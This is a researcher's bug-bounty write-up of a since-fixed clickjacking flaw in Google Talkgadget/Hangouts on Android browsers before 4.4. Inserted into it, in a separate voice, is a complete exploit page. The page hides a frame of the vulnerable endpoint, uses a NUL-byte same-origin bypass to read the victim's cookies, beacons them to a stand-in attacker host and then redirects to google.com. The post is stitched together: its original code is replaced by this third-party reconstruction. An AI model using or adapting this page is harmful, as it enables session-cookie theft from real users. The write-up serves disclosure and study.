Bug Type: Clickjacking Vulnerability
Browser: Android Browser
Vulnerable Module: Google Talkgadget / Hangouts
URL: https://talkgadget.google.com
Vulnerable Browser/users: Android < 4.4
Status: Fixed
Hello world 🙂, I really hope you guys are doing great. It's been a long time; I could not post stuff. This post is about a clickjacking vulnerability I found in one of the Google services, namely Google Hangouts. It was reported last year. Today I got the mail about the permanent fix from them. The vulnerable URL was:

https://talkgadget.google.com/u/0/talkgadget/_/frame?hl=en#p (fixed)
The tricky, technical part of a clickjacking bug is always how you extract content from the vulnerable page/domain once you can frame it: framing the page alone lets you overlay it, but the Same Origin Policy keeps the framed document opaque to the attacker's page, so you cannot read anything out of it. So, to exploit this vulnerability I used the research of Mr. Rafay Baloch on the Android Browser Same Origin Policy bypass in versions < 4.4. That research confirms an SOP (Same Origin Policy) bypass in the Android Browser in versions before 4.4. I would like to thank Mr. Rafay for permission to use his research in building this exploit.
I made the final webpage, which contains the following code:
All you need to do is send the URL of the crafted webpage to the victim; no user interaction is required beyond opening it. Once the victim opens the page in a vulnerable Android browser (< 4.4), it sends their cookies for the framed Google origin to the remote URL and then redirects them to google.
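What such a crafted page looks like in practice, as an added reconstruction of the chain described above: this is not the author's page (whose code is not reproduced in the post), nor Google's or Rafay Baloch's code. It assumes a hypothetical attacker-controlled collector URL, attacker.example/collect, and it assumes the bypass is triggered in the form Rafay Baloch published for the Android < 4.4 AOSP browser (CVE-2014-6041): a NUL byte in front of a javascript: URL passed to window.open() targeting the frame by name. On a browser that enforces the same-origin policy correctly the window.open() call is refused and nothing leaves the page. Note also that document.cookie never exposes cookies flagged HttpOnly, so only the non-HttpOnly part of the session reaches the collector.

```html
<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>loading...</title>
</head>
<body>
  <!-- Step 1: frame the vulnerable endpoint. This half of the chain works only
       because the endpoint sends no X-Frame-Options / CSP frame-ancestors header. -->
  <iframe id="victim" name="victim"
          src="https://talkgadget.google.com/u/0/talkgadget/_/frame?hl=en#p"
          style="width:1px;height:1px;visibility:hidden"></iframe>

  <script>
    // Hypothetical attacker-controlled endpoint that logs its query string
    // (assumption for this example; not part of the original post).
    var COLLECTOR = "https://attacker.example/collect";

    // Step 2: the code that must run inside the frame's origin. It reads
    // document.cookie (HttpOnly cookies are invisible to script and are
    // therefore not included) and ships it out with an image beacon.
    var payload =
      "(function(){" +
        "new Image().src='" + COLLECTOR +
          "?c='+encodeURIComponent(document.cookie);" +
      "})();";

    // Step 3: once the frame has loaded, navigate it to a javascript: URL.
    // A correct browser refuses this for a cross-origin frame. The Android
    // < 4.4 AOSP browser bug published by Rafay Baloch (CVE-2014-6041) is
    // that a leading NUL byte slips past that check, so the script executes
    // with the frame's origin. No click is needed; onload fires on its own.
    document.getElementById("victim").onload = function () {
      window.open("\u0000javascript:" + payload, "victim");

      // Step 4: after the beacon has had time to leave, send the victim on
      // to google.com so nothing looks out of place.
      setTimeout(function () {
        location.href = "https://www.google.com/";
      }, 1500);
    };
  </script>
</body>
</html>
```

To check whether an endpoint is still framable, request it with `curl -sI <url>` and look for an X-Frame-Options header or a Content-Security-Policy header carrying a frame-ancestors directive; the absence of both is what makes step 1 possible, and the SOP bypass is what turns a merely framable page into a cookie leak.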
I have made a video PoC with all the explanation.
I would like to thank Eduardo from Google for handling the report, and yes, it was really nice to meet you and all the other respected seniors of the Google security team (Michele, Josh, Chris, Kotowicz) at NullCon.
Thank you so much, Google, for the reward.